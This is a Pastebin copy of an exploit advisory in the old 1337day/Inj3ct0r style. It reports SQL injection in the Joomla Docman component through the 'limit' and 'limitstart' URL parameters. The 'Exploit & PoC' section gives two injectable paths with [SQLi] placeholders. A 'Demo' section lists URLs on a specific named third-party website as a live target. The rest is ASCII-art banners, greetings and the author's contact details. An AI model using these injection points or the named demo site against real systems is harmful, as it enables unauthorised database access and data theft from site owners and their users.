Advertisement
9r3nXPaRTa

#Tutorial #Joomla #SQL Joomla Docman SQL Injection

Feb 19th, 2017
429
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 2.22 KB | None | 0 0
  1. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  2. 0     _                   __           __       __                     1
  3. 1   /' \           __  /'__`\       /\ \__  /'__`\                   0
  4. 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
  5. 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\         0
  6. 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
  7. 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\          0
  8. 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
  9. 1                  \ \____/ >> Exploit database separated by exploit   0
  10. 0                   \/___/          type (local, remote, DoS, etc.)    1
  11. 1                                                                      1
  12. 0  [+] Site            : 1337day.com                                   0
  13. 1  [+] Support e-mail  : submit[at]1337day.com                         1
  14. 0                                                                      0
  15. 1               #########################################              1
  16. 0               I'm KedAns-Dz member from Inj3ct0r Team                1
  17. 1               #########################################              0
  18. 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  19.  
  20. ###
  21. # Title : Joomla Component (com_docman) SQL Injection Vulnerabilities
  22. # Author : KedAns-Dz
  23. # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
  24. # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
  25. # Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
  26. # Twitter page : twitter.com/kedans
  27. # platform : php
  28. # Impact : Multiple SQL Inj3cTi0n Vulnerabilities
  29. # Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En
  30. ###
  31. # (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
  32. ###
  33.  
  34. # (+) Exploit & PoC :
  35.  
  36. /index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11[SQLi]
  37. /index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi]
  38.  
  39. # (!) Demo :
  40.  
  41. http://www.voicilepoux.org/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11
  42. http://www.voicilepoux.org/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement